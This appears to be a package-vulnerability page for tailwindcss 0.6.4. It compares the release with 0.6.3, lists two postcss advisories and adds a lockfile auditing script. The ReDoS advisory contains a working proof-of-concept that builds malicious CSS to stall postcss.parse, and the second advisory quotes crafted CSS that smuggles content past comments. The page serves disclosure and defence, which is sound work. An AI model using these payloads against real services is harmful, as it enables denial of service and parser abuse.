Tailwind CSS version 0.6.4 is a minor update over the previous stable version, 0.6.3, of this utility-first CSS framework for rapid UI development. The package metadata shows a minimal set of changes. Both versions declare identical dependencies, including lodash, postcss, fs-extra, and the PostCSS plugins that provide Tailwind's core functionality. The development dependencies used for testing and building the library (jest, eslint, prettier, and Babel presets among them) are also identical between the two versions, and the build process is unchanged.
The one measurable difference is in the dist section, specifically unpackedSize: version 0.6.4 has a slightly smaller unpacked size of 2039202 bytes compared to the older version's 2039362 bytes, which suggests minor adjustments to the codebase or assets. The releaseDate shows a five-day gap between the two versions, so 0.6.4 most likely incorporates bug fixes, very minor enhancements, or documentation updates made after 0.6.3 was released. For developers using Tailwind CSS, the two versions are functionally equivalent for most use cases. Upgrading from 0.6.3 to 0.6.4 is recommended but not critical; the main benefit is picking up any recent fixes or minor improvements. Tailwind's utility classes, responsive design features, and customization options work the same with either version.
All vulnerabilities related to version 0.6.4 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

// Build a CSS string with n repeated, unterminated sourceMappingURL comment
// openers, which is the input the vulnerable regex backtracks on.
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse on a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time parse() on inputs of growing length; on a vulnerable postcss the
// time per parse grows super-linearly with attack_str.length.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.
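Both advisories above are about the postcss dependency rather than Tailwind itself, and a project pinned to tailwindcss 0.6.4 can carry an old postcss nested under it even when the hoisted copy is patched. The following is an added example, not code from this page, Tailwind or PostCSS: it audits a package-lock.json for every postcss copy inside the version ranges the two advisories state. The lockfile content is constructed for the demo, and the reading of "between 8.0.0 and 8.2.13" as >=8.0.0 <8.2.13 is an assumption.

```javascript
// Vulnerable ranges as stated on the page; "between 8.0.0 and 8.2.13" is read
// as >=8.0.0 <8.2.13 (8.2.13 being the fixed release), which is an assumption.
const POSTCSS_ADVISORIES = [
  { title: 'Regular Expression Denial of Service in postcss',
    ranges: ['<7.0.36', '>=8.0.0 <8.2.13'] },
  { title: 'PostCSS line return parsing error', ranges: ['<8.4.31'] },
];
// Parse "MAJOR.MINOR.PATCH"; a leading "v" and any prerelease/build suffix are
// dropped, so prerelease ordering is not modelled (enough for release versions).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error('unparseable version: ' + v);
  return m.slice(1, 4).map(Number);
}
function compareVersions(a, b) {
  const [pa, pb] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  return 0;
}
// A range is space-separated comparators that must all hold, e.g. ">=8.0.0 <8.2.13".
function satisfies(version, range) {
  return range.split(/\s+/).every((comp) => {
    const [, op = '=', target] = /^(<=|>=|<|>|=)?(.+)$/.exec(comp);
    const c = compareVersions(version, target);
    return { '<': c < 0, '<=': c <= 0, '>': c > 0, '>=': c >= 0, '=': c === 0 }[op];
  });
}
// Walk the "packages" map of a v2/v3 package-lock.json and report every postcss
// copy, hoisted or nested, whose version falls inside an advisory range.
function auditLockfile(lockJson) {
  const findings = [];
  for (const [path, meta] of Object.entries(JSON.parse(lockJson).packages || {})) {
    if (!path.endsWith('node_modules/postcss') || !meta.version) continue;
    const hits = POSTCSS_ADVISORIES
      .filter((adv) => adv.ranges.some((r) => satisfies(meta.version, r)))
      .map((adv) => adv.title);
    if (hits.length) findings.push({ path, version: meta.version, advisories: hits });
  }
  return findings;
}
// Constructed sample lockfile: a patched hoisted postcss plus an old copy nested
// under tailwindcss 0.6.4 (the nested version number is made up for the demo).
const SAMPLE_LOCK = JSON.stringify({ lockfileVersion: 3, packages: {
  'node_modules/postcss': { version: '8.4.31' },
  'node_modules/tailwindcss': { version: '0.6.4' },
  'node_modules/tailwindcss/node_modules/postcss': { version: '6.0.23' },
} });
console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```

Only the nested 6.0.23 copy is reported, matching both advisories, while the hoisted 8.4.31 is clean; replace SAMPLE_LOCK with the contents of a real package-lock.json to audit a project.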